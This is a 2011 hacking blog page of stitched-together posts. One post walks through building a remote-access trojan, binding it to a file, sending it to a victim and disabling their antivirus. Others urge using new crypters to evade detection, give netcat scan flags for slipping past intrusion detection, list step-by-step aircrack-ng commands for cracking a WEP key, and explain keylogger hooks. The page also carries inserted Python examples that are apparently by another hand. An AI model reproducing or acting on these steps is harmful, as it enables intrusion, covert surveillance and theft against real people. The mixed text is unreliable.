Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking, get the latest Tips and Tricks, free Hacked and Cracked Software, and SEO.


Monday, 31 October 2011

How to Hack the remote system using Remote Administration Tools?

What are RATs (Remote Administration Tools)?
Newbie : Hello Best4hack, I heard a new keyword, RATs, in the hacking world. What is it? I only know about the other kind of rats.

Best4hack :  RATs are known as Remote Administration Tools. I hope you understand what they do from the name itself.

Newbie : So they are used for hacking remote PCs, right?

Best4hack : Yes, they are used for hacking into victim computers remotely. Using RATs you can get control over remote PCs.

Newbie : OK. Can you explain more about the uses of RATs?

Best4hack : Yes, sure. Here it is:

Use of RATs (Remote Administration Tools)

  • Install any malicious software (keyloggers, ...)
  • Monitor chat windows
  • Turn off the system remotely
  • Disable antivirus/registry/restore points
  • Steal passwords and license keys of their software
  • Access the Control Panel
  • Add or remove any programs
  • Show fake error messages to the victim
  • Control printers
  • Format the entire hard drive
  • Open FTP (File Transfer Protocol) and transfer files
  • Control the Internet browser
  • more fun...



N00b: Thank you Best4hack. How do I do that?

How to work with RATs?
Step 1:

First of all you have to download Remote Administration Software and install it on your system.

Step 2:
Then you have to create a server using the RAT software. Here, the server is our trojan that is going to bring the victim's system under control.

Step 3:
Bind the server with any file (JPEG, doc, txt, ...). You can bind it using some binder. Most RATs provide a binding option as well.

Step 4:
Send this file to the victim. Once the victim opens the file, the server will start to run. It will disable antivirus, registry, ... depending on your configuration.

Step 5:
Find the IP address of the victim (there are different methods to find an IP address; read my previous articles). Once you have the IP address, you can connect to the remote system using your Remote Administration Tool.

Now the world is under your control.


Noob: Wow. Hey Best4hack, I have heard somewhere about reverse connection in RATs. What is that?

Connections in RATs
Direct Connection:
In a direct connection, our system (with the Remote Administration Tool installed) is the client and the victim's system acts as the server. Our system connects to the remote system and takes control over it. You have to find the IP address of the victim and connect to that system. Some highly secure firewalls will block connections to the system on open ports.


Reverse Connection:
Reverse connection is for bypassing the firewall restrictions on open ports. Firewalls restrict the open ports but not the outgoing traffic.
In a direct connection, the client connects to the server using an open port of the server.
In a reverse connection, the client opens the port and the server connects to that open port.


I think you are a little bit confused, right? In simple words,
in a reverse connection the victim's computer connects automatically to our computer (in a direct connection, we have to connect to the victim's system using their IP address).

Got it?

Advantages of Reverse Connection:
  • You don't need to know the victim's IP address (because it connects to our system).
  • Bypassing the firewall restrictions

Here is the list of popular RAT software:
  1. Back Orifice
  2. Bifrost
  3. Bandook RAT
  4. Cerberus RAT
  5. Poison Ivy
  6. Darkcomet-RAT
  7. Sub Seven (Sub7)
  8. TeamViewer
  9. NetCAR
  10. Netop Remote Control
  11. Netop OnDemand
  12. Netop Mobile & Embedded
  13. Y3k RAT
  14. Optix Pro
  15. LANfiltrator
  16. ProRat
  17. Turkojan
  18. Nuclear Rat
  19. Shark Rat
  20. Lost door
  21. DarkComet-RAT
  22. CyberGate

Undetectable by Antivirus:
N00b: Most antivirus programs detect the server file as a virus. What can I do?

BreakTheSec: So you don't know about FUD?

N00b: What does FUD mean?
BreakTheSec: Follow this link to know about Crypters.

N00b: Can I get traced by the victim?
BreakTheSec: No.  A system gets over 300 connections.  It is hard to trace you.

Note:
This is for educational purposes only. Using a RAT to control an unauthorized system is completely a crime. So please don't try to do it. (Discussing or reading about a thief's technique is not a crime, but implementing it is.)

How to make Virus/spyware Undetectable by all antivirus?

Usually, if you create malicious programs (virus, spyware, ...), the antivirus will detect them easily. It will scan the source code; if it finds malicious source code, then it will alert you with "virus". To know more details about antivirus programs, read this article:
How does Anti Virus detect viruses

I hope you now know about the antivirus functions completely. In that article, I mentioned the "Crypter" keyword. Now let us see more about Crypters.



What is a Crypter?

A crypter can make any type of malicious program (virus, spyware, ...) undetectable by all antivirus.

How does a crypter make a virus undetectable?

I have said that a crypter will make a virus undetectable. OK. How does it do that? It will encrypt the malicious code.
For instance,
In the "Mission Impossible" movie, the villain wears a mask and makes the heroine believe that he is the hero.
Likewise, this crypter will create a masked form of the malicious code. So the antivirus programs will think that the code is safe to use.

Drawback of Crypters
Nowadays antivirus programs are upgraded to detect the malicious code. If the crypter software is publicly available, the antivirus vendors get the algorithm of that crypter and include it in their virus definitions. So if the virus is encrypted with that crypter, the antivirus easily finds that it is malicious code.

Fully Undetectable Crypter (FUD)
A crypter that is not publicly available is known as a FUD crypter. So a FUD crypter will be useful to create fully undetectable virus programs.

You can download the latest crypter from hacking related forums.

Use the crypter as soon as it is released; the antivirus will find the crypter algorithm within a certain number of days, so you have to use it as soon as possible.

How Does Anti virus detect viruses?

I hope you know what computer Anti Virus is. But you may not know how the anti virus works. Here I am sharing how antivirus software works.


What do you know about Anti Virus software?

Antivirus software gives protection against viruses and malware. Antivirus can detect the malicious software, then delete it or put it in quarantine.



The process behind the Anti Virus

The antivirus follows two methods to detect malicious software. They are
  • Virus Dictionary Based Detection
  • Suspicious Activity Detection

Virus Dictionary Based Detection
In this method, the antivirus maintains a dictionary file which has the identified virus signatures. Whenever an executable is run, the antivirus will check the executable file's code against the dictionary. If the code matches any virus signature, then the antivirus will immediately inform you that a virus is found.
The antivirus will check the executable file whenever the file is opened, created, emailed or downloaded.

Example:
Let us assume the malicious code is "11010011" and this code is in the dictionary file. If any executable file runs with the above malicious code, the antivirus immediately blocks it and alerts the user.

Day by day hackers create new viruses, and the source code of the viruses will vary. The antivirus cannot detect a new virus with old virus signatures. You have to update the virus signatures so that it can detect new viruses.


Drawback of this Method

Hackers found a hacking trick to bypass this security method: the crypter. Yes, hackers can encrypt the source code into different source code such that it will look like the safest source code. So if the antivirus checks the source code, it won't find the malicious code (because it is in another form). (I will give a detailed explanation about the crypter in my next post.) The drawback can be solved by including the crypted malicious code in the dictionary file.

Suspicious Activity Detection
The suspicious activity detection method is more effective than the dictionary based approach. It can detect even a new virus. The antivirus observes the behavior of the executable file. If the executable file does any illegal process or creates any executable file, the antivirus will block the executable file and alert the user.


Drawback
It is an annoying process. The accuracy is less, so it may detect a safe executable file as a virus.
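To make the two methods concrete, here is an added example (not code from the original post) that runs a toy dictionary scan and a toy activity score over constructed samples: the same program in its original and re-encoded form, plus a benign installer that trips the heuristic. The signatures, event names, weights and threshold are all made up for the illustration.

```python
"""Dictionary (signature) detection versus suspicious-activity detection.
Added example for this page, not the page's own code; every sample, signature,
weight and threshold below is constructed for illustration."""

# ---- 1. Virus dictionary based detection --------------------------------------
# The page's example signature is the bit pattern "11010011".  Here it is the
# byte 0b11010011 (0xD3) followed by three more constructed bytes, because a
# one-byte signature would match almost any file.
SIGNATURES = {
    "Page.Example.11010011": bytes([0b11010011, 0x90, 0x90, 0xC3]),
    "Constructed.Dropper":   b"\\drop\\update.exe",
}

def signature_scan(sample):
    """Names of every dictionary entry whose byte pattern occurs in `sample`."""
    return sorted(name for name, sig in SIGNATURES.items() if sig in sample)

# ---- 2. Suspicious activity detection -----------------------------------------
# Score what an executable *does* instead of what its bytes *look like*.
# Event names and weights are constructed; real products use far richer models.
EVENT_WEIGHTS = {
    "create_executable": 3,   # wrote a new .exe/.dll to disk
    "registry_autorun":  3,   # added itself to a Run key
    "disable_antivirus": 5,   # stopped or altered security software
    "keyboard_hook":     4,   # installed a global keyboard hook
    "outbound_connect":  1,   # opened a network connection
}
ALERT_THRESHOLD = 6

def behaviour_score(events):
    """Sum of the weights of the suspicious events an executable performed."""
    return sum(EVENT_WEIGHTS.get(e, 0) for e in events)

def verdict(sample, events):
    """'signature' if the dictionary matched, else 'behaviour' if the activity
    score reaches the threshold, else 'clean'."""
    if signature_scan(sample):
        return "signature"
    if behaviour_score(events) >= ALERT_THRESHOLD:
        return "behaviour"
    return "clean"

def add_signature(name, pattern):
    """The page's remedy: once the re-encoded form is seen, add it to the dictionary."""
    SIGNATURES[name] = pattern

# ---- Constructed samples ------------------------------------------------------
# Known malware: its bytes contain the dictionary pattern.
KNOWN_SAMPLE = b"MZ\x90\x00" + bytes([0b11010011, 0x90, 0x90, 0xC3]) + b"\x00" * 8
# The same program after a "crypter" re-encoded it: different bytes, same
# behaviour.  (The bytes are simply constructed to contain no dictionary pattern.)
REENCODED_SAMPLE = b"MZ\x90\x00" + bytes([0x2C, 0x6F, 0x6F, 0x3C]) + b"\x11" * 8
MALWARE_EVENTS = ["disable_antivirus", "keyboard_hook", "outbound_connect"]

# Benign installer: no signature, but it writes executables and registers an
# autorun entry, which is exactly the activity the heuristic distrusts.
INSTALLER_SAMPLE = b"MZ\x90\x00setup\x00"
INSTALLER_EVENTS = ["create_executable", "create_executable", "registry_autorun"]

if __name__ == "__main__":
    print("known sample:    ", verdict(KNOWN_SAMPLE, MALWARE_EVENTS))        # signature
    print("re-encoded:      ", verdict(REENCODED_SAMPLE, MALWARE_EVENTS))    # behaviour
    print("benign installer:", verdict(INSTALLER_SAMPLE, INSTALLER_EVENTS))  # behaviour (false positive)
    add_signature("Page.Example.11010011.crypted", bytes([0x2C, 0x6F, 0x6F, 0x3C]))
    print("re-encoded now:  ", verdict(REENCODED_SAMPLE, MALWARE_EVENTS))    # signature
```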

Remotely Access other Computers using Google Chrome


A new Chrome extension named Chrome Remote Desktop BETA allows users to access another computer remotely. This is the first software that demonstrates the core Chrome Remoting technology.

This version enables users to share with or get access to another computer by providing a one-time authentication code. Access is given only to the specific person the user identifies, for one time only, and the sharing session is fully secured. One potential use of this version is the remote IT helpdesk case. The helpdesk can use the Chrome Remote Desktop BETA to help another user, while conversely a user can receive help by setting up a sharing session without leaving their desk. Additional use cases such as being able to access your own computer remotely are coming soon.

Chrome Remote Desktop BETA is fully cross-platform, so you can connect any two computers that have a Chrome browser, including Windows, Linux, Mac and Chromebooks.

This app can access:
  • Your data on accounts.google.com, www.google.com, and 2 other websites
  • All data on your computer and the websites you visit
  • Your tabs and browsing activity

Private Access Codes:



As per the user review:
It is performing well. You may need a better internet connection.

Scan Open Ports/Services of Target: Netcat

Prerequisites: None

Countermeasures: Uninstall/disable/fix unnecessary services, Intrusion Detection Systems (IDS), Log and Event Log review

Description: The netcat application has many uses; one is the ability to scan a target for open ports and services. Another utility, cryptcat, is almost identical except that it operates with encryption.
Procedure: From a DOS prompt, type the following, with the syntax:
nc <options> <Hostname or IP Address> <Port Range>
  • The -v option instructs netcat to run in verbose mode, allowing you to see the progress of the scan.
  • The -r option instructs netcat to randomize local and remote ports in an attempt to elude any intrusion detection systems.
  • The -w2 option instructs netcat to wait 2 seconds between each port scanned to help elude any intrusion detection systems.
  • The -z option instructs netcat to operate in zero-I/O (Input/Output) mode. It is best to use -z when scanning with netcat.
  • The 1-1024 instructs netcat to scan ports 1-1024.
In this example, the target has the following ports open:
  • 80 (Web)
  • 7 (Echo)
  • 13 (daytime)
  • 21 (FTP)
  • 17 (Quote of the Day)
  • 445 (Windows Share)
  • 9 (discard)
  • 139 (Windows Share)
  • 19 (Character Generator)
  • 135 (epmap)
  • 443 (HTTPS)
  • 25 (Simple Mail Transfer Protocol [SMTP])
Note: From the results of this example the "low hanging fruit" ports are 7, 13, 17, 9, and 19, as these ports can easily be used to create a Denial of Service (DoS). These ports should not be open to the Internet.
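From the defender's side (the IDS and log review named under Countermeasures), here is an added example, not from the original page, that flags any source touching many distinct ports within a time window, run over constructed connection-log lines; it also picks out the small-service ports the note above says should be closed. The log format, addresses, timing and thresholds are assumptions.

```python
"""Detecting the port sweep described above from connection logs.
Added example for this page (not code from the original post).  The log
format and every sample line are constructed; the point is to show why a
short detection window misses a sweep that pauses between ports (the -w2
behaviour the text describes) while a longer window still catches it."""
import random
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log line format: "YYYY-MM-DD HH:MM:SS src=A dst=B dport=N"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) src=(?P<src>\S+) "
    r"dst=(?P<dst>\S+) dport=(?P<dport>\d+)$")

def parse_line(line):
    """Return (timestamp, source, destination port) or None for junk lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return (datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            m["src"], int(m["dport"]))

def detect_sweeps(lines, window_seconds, min_ports):
    """Map each source that touched at least `min_ports` distinct destination
    ports inside some `window_seconds` window to the largest such count."""
    per_src = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ts, src, dport = parsed
            per_src[src].append((ts, dport))
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for src, events in per_src.items():
        events.sort()                      # logs are rarely ordered per source
        best, start = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                 # slide the window forward
            best = max(best, len({p for _, p in events[start:end + 1]}))
        if best >= min_ports:
            flagged[src] = best
    return flagged

# The page's "low hanging fruit": legacy small services that should be closed.
SMALL_SERVICES = {7: "echo", 9: "discard", 13: "daytime", 17: "qotd", 19: "chargen"}

def risky_open_ports(open_ports):
    """Subset of `open_ports` that belong to the small-services group."""
    return sorted(p for p in set(open_ports) if p in SMALL_SERVICES)

# Open ports listed in the page's example scan result.
EXAMPLE_OPEN_PORTS = [80, 7, 13, 21, 17, 445, 9, 139, 19, 135, 443, 25]

def make_log():
    """Constructed log: one normal client, one fast sweep, one slow sweep."""
    base = datetime(2011, 10, 31, 9, 0, 0)
    fmt = "%Y-%m-%d %H:%M:%S"
    lines = []
    for i in range(6):                     # normal client: 80/443 now and then
        t = base + timedelta(seconds=100 * i)
        lines.append(f"{t:{fmt}} src=10.0.0.50 dst=10.0.0.9 dport={443 if i % 2 else 80}")
    rng = random.Random(7)                 # fixed seed: reproducible sample
    ports = list(range(1, 1025))
    rng.shuffle(ports)                     # randomized order, like -r
    for i, p in enumerate(ports):          # fast sweep: 1024 ports in about 1 s
        t = base + timedelta(milliseconds=i)
        lines.append(f"{t:{fmt}} src=10.0.0.66 dst=10.0.0.9 dport={p}")
    for i in range(60):                    # slow sweep: one port every 2 s (-w2)
        t = base + timedelta(seconds=2 * i)
        lines.append(f"{t:{fmt}} src=10.0.0.77 dst=10.0.0.9 dport={i + 1}")
    rng.shuffle(lines)
    return lines

LOG = make_log()

if __name__ == "__main__":
    print("10 s window :", detect_sweeps(LOG, 10, 20))    # only the fast sweep
    print("120 s window:", detect_sweeps(LOG, 120, 20))   # both sweeps
    print("close these :", risky_open_ports(EXAMPLE_OPEN_PORTS))
```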

What is A Hacker

A hacker is known to build things and solve problems, not to break or crack any system. The computer industry initially hired good programmers to make sure their systems were foolproof. However, over the years, the media, journalism and writers have played a very important role in changing the real meaning of the word hacker. They themselves are very confused about the terms Hacker and Cracker. A typical definition of a Hacker that today comes to your mind is that a Hacker is a person who tries to gain unauthorized access to any property and computers. The term Hacker came as slang from the computer world. So, different people have given different definitions to it. But what remains the common point is that whenever you hear the word hacker, the first thing that comes to your mind is always negative and bad. However, the real meaning of a hacker is a programmer who really finds it thrilling to learn more, who likes to explore more details about the programming language and hence stretches his or her capabilities more than any average person.
Crackers are people who get a cheap thrill out of cracking computer codes and breaking into systems. Hence, these are the people who have negativity around them, and they only believe in breaking or cracking access to any kind of system that they have no authorization to. They are malicious, annoying people who try to uncover sensitive information by poking their unwanted nose everywhere. Hackers, on the other hand, are knowledgeable and responsible people. They like to take intellectual challenges and like to overcome all limitations that are there in a particular system. Learning to hack is not very easy. It is a special gift that is only given to a select few. Only people who are good at searching and keeping themselves updated about the latest technology are the ones who are blessed with it. Only being good with computers does not qualify one to be a good hacker. Some people also reapply their hacking knowledge to different fields like music and electronics. It is also said that every hacker is independent of any kind of hack he does, call it in the computer field or elsewhere. Hackers are known to be ethical and wise in their practice.
The reality is: 'Hackers build things, crackers break them.'
Today the hacker world has been given 3 different names. The White hat hackers, who do all the good things and are positively motivated people; then we have the Black hat hackers, also called the crackers, who are usually into the negative work of cracking and breaking into someone's system; and finally the third and last are the grey hat hackers, who explore the best of both worlds. To conclude, we can say that Hackers are people who are skilled programmers that work for a positive cause or a goal, either for themselves or for an organization, which could be private as in an industry, or for the government.

Thinking of A Hacker


The thinking of a hacker is very much the same as that of a good program developer. Hackers who have been successful have developed a common strategy over a period of time. This strategy is to very patiently and carefully document every step, which is what programmers do. They are good at analyzing and following a methodical approach of investigation. So when they start they don't have much background; they start from scratch and gradually build what is called the entire roadmap or game plan.
It is a known fact that in order to think like a master hacker one should imitate all the big hackers both intellectually and emotionally, as they always work on a different platform, and it is the platform of Self Belief.
1. The typical thinking of a Hacker is that they believe the world is full of ongoing problems which continuously need solutions. So looking for solutions should be the ultimate aim, and not giving up until the problem is cracked.
2. Another fundamental that they work on is that the same wheel should not be invented twice, as it will be a waste of both time and effort. Brains with creativity should be used for new purposes and not older ones. So, they believe in the theory that time is precious and make the best out of it.
3. The third fundamental truth that they believe in is that repetition is what leads to success, and no word like boredom can be found in their dictionary.
4. The next good thing they believe in is Freedom. Most hackers work independently and that is a strong foundation for them to grow. It is said that freedom has no limit to the growth of an individual.
5. There is no replacement for a good attitude: an attitude to fight and not take flight. One can give up whenever he or she wants. It is only the attitude that makes you different from the others.
6. Hackers believe in a value system that is not negotiable and do not compromise on it, because if they did then they would be crackers and not hackers.
Documentation is said to be the wisest thing that any developer, a simple programmer or a hacker, maintains. At times finding solutions is so difficult that it is only the documentation that can help one understand the entire process all over again. It is like a treasure hunt in a jungle with small clues that take you to the next clue and one step closer to the final gift.

Thursday, 27 October 2011

Use Pen drive As RAM - Speed Up Computer

Today I'll show you a nice trick to boost the working speed of your computer, as nowadays there are a large number of programs and software which require a large amount of memory to run properly, and often you don't have that required memory installed as RAM. I'll talk about this trick generally so that it may be applicable to every Windows version. First I'll show you a manual way and after that I'll provide you a software for this purpose. The basic scheme is that we are going to use a pendrive or USB drive as RAM. Yes, it is possible: all the memory available in a removable pendrive/USB can be converted into RAM to increase the working speed of the computer.

Manual Method to Convert USB/Pendrive Into RAM:-

Here is the required procedure for converting USB/pendrive memory into RAM manually:
1) Plug your pendrive into the PC/laptop.
2) Right click on My Computer.
3) Open up Properties.
4) Go to the Advanced option.
5) Now select Settings under Performance.
6) Again click on the Advanced button shown in the popup window.
7) Now click on the Change button shown under Virtual memory.
8) Now select the available memory of your removable USB/pendrive.
9) Set the value and apply the changes.
10) Restart your PC/laptop and you are done.

Using eBoostr Software to Convert USB/Pendrive into RAM:-

A clean piece of software is also available for this purpose, known as eBoostr. It will convert your removable device memory into RAM and thus computer speed will be increased to a large extent.
Is eBoostr free, and which Windows versions are capable of running it?
No, eBoostr is not free, and it is available as a non-expiring trial version, which means that we can use it continuously for just 4 hours. After that our PC will have to be restarted in order to make eBoostr active and working again. Well, 4 hours for every boot is enough for a normal computer user. If you want to use it without any break then kindly purchase the full version here. After downloading just run it and use it; its usage is quite simple, so no guide is necessary for it.
The software is very handy in the sense that it is just 1MB to download. It supports Windows XP, Windows 2000 and Windows 2003 and is available in 36 languages. It requires a USB 2.0 drive or memory card for operation; USB 1.1 is not supported as such drives tend to be very slow and don't work at the required speed. So, in short, a Pentium 4 is better for its usage.
Give this method a try and tell me about your experience in the comments...! Some day later I'll provide you the free eBoostr full version.


Tuesday, 25 October 2011

Wi-Fi Network Hacking

This tutorial will explain how to crack a WEP key using Backtrack..!!




Step 1:-
First download Backtrack from the following link:
Step 2:-
Burn the ISO image to a CD and boot your laptop from the CD drive.
Step 3:-
Select the third boot option (VESA/KDE).
Step 4:-
Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window.
Step 5:-
Type the following command:
airmon-ng
Note down the interface name. In this example it is wifi0.
Step 6:-
airmon-ng stop wifi0
Step 7:-
ifconfig wifi0 down
Step 8:-
macchanger --mac 00:11:22:33:44:66 wifi0
Step 9:-
airmon-ng start wifi0
Step 10:-
airodump-ng wifi0
This will start populating Wi-Fi networks. Press Ctrl + C to stop.
Check for a network with WEP encryption.
Note down the BSSID, CH and ESSID somewhere in notepad or on paper.
Note that if the same BSSID is also listed in the second part with a STATION associated with it, it means someone is accessing that network and our task will be a little easier. If not, then don't worry, we will still crack it.
Step 11:-
airodump-ng -c (channel) -w (file name) --bssid (bssid) wifi0
Replace
(channel) with the CH which you had already noted
(file name) with any name of your choice
(bssid) with the BSSID which you had already noted
Leave this console as it is and start a new konsole.
Step 12:-
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don't get an "Association Successful" message then keep on trying until you succeed.
Step 13:-
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well, if you don't see ARP ACK and the sent packets are not increasing or still 0, then it means no one is accessing that network. But don't worry, you have an optional step.
Leave this console as it is and start a new konsole.
Step 14:-
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) -h 00:11:22:33:44:66 wifi0
Press y and enter.
Now you will see that the ARP and ACK packets in the 2nd console are increasing fast.
Keep this console as it is and start a 4th console.
Step 15:-
aircrack-ng -b (bssid) (filename)-
Just wait and watch... Backtrack will do the rest of the work.
Hurray, we got the key.

Done..!!


Wireless networks are everywhere; they are widely available, cheap, and easy to set up. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network?
I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard.

How a wireless network works
A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs) or clients.
Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with.
The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with every NIC.
For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range.
Data streams, known as packets, are sent between the Access Point and its clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is the transmission of these packets that poses the largest security threat to any wireless network.

Wireless Encryption
The majority of home and small business networks are encrypted using the two most popular methods: WEP and WPA.
WEP – Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively. WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24 bit Initialization Vector (IV) and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)
WEP also comes in WEP2 and WEP+, which are not as common and are still as vulnerable as the standard WEP encryption.
WPA – WiFi Protected Access – comes in WPA and WPA2, and was created to resolve several issues found in WEP. Both provide you with good security; however, they are not compatible with older devices and therefore not used as widely. WPA was designed to distribute different keys to each client; however, it is still widely used in a (not as secure) pre-shared key (PSK) mode, in which every client has the same passphrase.
To fully utilize WPA, a user would need an 802.1x authentication server, which small businesses and typical home users simply cannot afford. WPA utilizes a 48 bit Initialization Vector (IV), twice the size of WEP's, which combined with other WEP fixes allows substantially greater security over WEP.

Packets and IVs
It's all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security of your network. If that frightens you, start stringing wires throughout your home.
Every encrypted packet contains a 24 or 48 bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing. The IV must be known to the client that receives the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.
The problem with this method is that the Initialization Vectors are not always different. In theory, if every IV was different, it would be nearly impossible to obtain the network key; this is not the case. WEP comes with a 24 bit IV, therefore giving the encryption 16 million unique values that can be used. This may sound like a large number, but when it comes to busy network traffic, it's not.
Every IV is not different, and this is where the issues arise. Network hackers know that all the keys used to encrypt packets are related by a known IV (since the user-entered WEP part of the key is rarely changed); therefore, the only change in the key is 24 bits. Since the IV is randomly chosen, there is a 50% probability that the same IV will repeat after just 5,000 packets; this is known as a collision.
If a hacker knows the content of one packet, he can use the collision to view the contents of the other packet. If enough packets are collected with IV matches, your network's security can be compromised.
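To put numbers on the 24-bit IV argument, here is an added example (not part of the original post) that applies the birthday bound to the IV space; it goes beyond the text by running the same formula for the 48-bit IV mentioned earlier for WPA.

```python
"""Birthday bound on WEP's 24-bit Initialization Vector.
Added example for this page, not the post's own code.  With n packets each
carrying an IV drawn uniformly from N = 2**iv_bits values, the probability
that some IV value repeats is p(n) = 1 - exp(-n(n-1)/(2N)).  The same formula
applied to a 48-bit IV shows what WPA's larger IV buys."""
import math

def iv_space(iv_bits):
    """Number of distinct IV values: 2**24 is the '16 million' in the text."""
    return 2 ** iv_bits

def collision_probability(n_packets, iv_bits):
    """Probability that at least two of n_packets random IVs coincide."""
    n = n_packets
    return 1.0 - math.exp(-n * (n - 1) / (2.0 * iv_space(iv_bits)))

def expected_colliding_pairs(n_packets, iv_bits):
    """Expected number of IV pairs that collide among n packets: C(n,2) / N."""
    return n_packets * (n_packets - 1) / 2 / iv_space(iv_bits)

def packets_for_probability(p, iv_bits):
    """Smallest n such that collision_probability(n, iv_bits) >= p.
    Start from the closed form n ~ sqrt(2 N ln(1/(1-p))) and adjust by one."""
    n = int(math.sqrt(2 * iv_space(iv_bits) * math.log(1.0 / (1.0 - p))))
    while collision_probability(n, iv_bits) < p:
        n += 1
    while n > 1 and collision_probability(n - 1, iv_bits) >= p:
        n -= 1
    return n

if __name__ == "__main__":
    for bits, label in ((24, "WEP"), (48, "WPA")):
        n50 = packets_for_probability(0.5, bits)
        print(f"{label}: {iv_space(bits):,} IV values; 50% chance of a repeat "
              f"after {n50:,} packets")
    # The page's figure: about 5,000 packets for WEP.
    print(f"p(5000 packets, WEP) = {collision_probability(5000, 24):.3f}")
```

The WEP figure lands at 4,824 packets, matching the "5,000 packets" above; the 48-bit IV needs roughly 19.75 million packets before the same 50% point, about four thousand times more.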

The crack
Two of the most popular programs used for actually cracking the WEP key are Airsnort and Aircrack. Airsnort can be used with the .dump files that Kismet provides, and Aircrack can be used with the .cap files that Airodump provides.
Airsnort can be used on its own without any other software capturing packets; although, it has been reported to be extremely unstable in this state, and you should probably not chance losing all your captured data. A better method would be to let Airsnort recover the encryption key from your Kismet .dump file. Kismet and Airsnort can run simultaneously.
For this demonstration, we'll be using Aircrack. You can use Airodump to capture the packets, and Aircrack to crack the encryption key at the same time.
With Airodump running, open a new command window and type:
aircrack -f 3 -n 64 -q 3 george.cap
The -f switch followed by a number is the fudge factor, which is a variable that the program uses to define how thoroughly it scans the .cap file. A larger number will give you a better chance of finding the key, but will usually take longer. The default is 2.
The -n switch followed by 64 indicates that you are trying to crack a WEP 64 key. I knew because it was a setup; in the real world there is no way to determine what WEP key length a target access point is using. You may have to try both 64 and 128.
The -q 3 switch was used to display the progress of the software. It can be left out altogether to provide a faster crack; although, if you've obtained enough unique IVs, you should not be waiting more than a couple of minutes.
The -m switch can be used, followed by a MAC address, to filter a specific AP's usable packets; this would come in handy if you were collecting packets from multiple APs in Airodump.
Aircrack recovered my WEP 64 key within 1 minute using 76,000 unique IVs; the whole process took around 34 minutes.
The same experiment was repeated with WEP 128 and it took about 43 minutes. The reason it was not substantially longer is because I simply let Aireplay replay more packets. Sometimes you can get lucky and capture an ARP Request packet within a few minutes; otherwise, it could take a couple of hours.



WI-FI HACKING TOOLS


I am going to share with you some of my favorite wireless tools that can be used to hack Wi-Fi passwords using Ubuntu or any other Linux distribution:

Aircrack-ng
Aircrack-ng (a fork of aircrack) is my main tool for cracking Wi-Fi passwords. It has a wireless network detector, a packet sniffer, a WEP and WPA/WPA2-PSK cracker, and an analysis tool for 802.11 wireless LANs. Aircrack-ng works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic.

Download: Aircrack-ng


Kismet
Kismet is a really good network detector, packet sniffer, and intrusion detection system for 802.11 wireless LANs. It will work with any wireless card which supports raw monitoring mode, and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet works in passive mode, which means it is capable of detecting the presence of both wireless access points and wireless clients without sending any loggable packets.
Kismet does a little more than just detect networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system.

Download: Kismet


NetStumbler

Network Stumbler, a.k.a. NetStumbler – this Windows based tool easily finds wireless signals being broadcast within range – a must have. It also has the ability to determine Signal/Noise info that can be used for site surveys. I actually know of one well known public wireless hotspot provider that uses this utility for their site surveys.


Download: NetStumbler


SWScanner
SWScanner is specifically designed to make the whole wardriving process a lot easier. It is also intended to manage many tasks related to wireless networking. SWScanner is compatible with NetStumbler files and can be integrated with GPS devices.
These are only three of the many wireless tools that can get you going in no time, so feel free to explore.

Download: SWScanner

Keylogger Tutorial

Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.

About keyloggers 
A keylogger is a program that runs in the background and records every keystroke. The captured keystrokes are either hidden on the machine for later retrieval or shipped raw to the attacker, who combs through them for passwords or anything else that helps compromise the system or feed a social engineering attack; the full text of every e-mail the user composed is in there, for instance. Keyloggers are commonly bundled with rootkits.

One common Windows design uses two files: a DLL that does the work and an EXE that loads the DLL and installs the keyboard hook. A global WH_KEYBOARD hook has to live in a DLL because Windows loads it into every process that receives keyboard input, so when you deploy such a hooker both files must be present in the same directory. (A low-level WH_KEYBOARD_LL hook needs no DLL, which is why many simpler loggers are a single executable.)

There are other approaches to capturing info about what you are doing.

    * Some keyloggers capture screens, rather than keystrokes.
    * Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection.

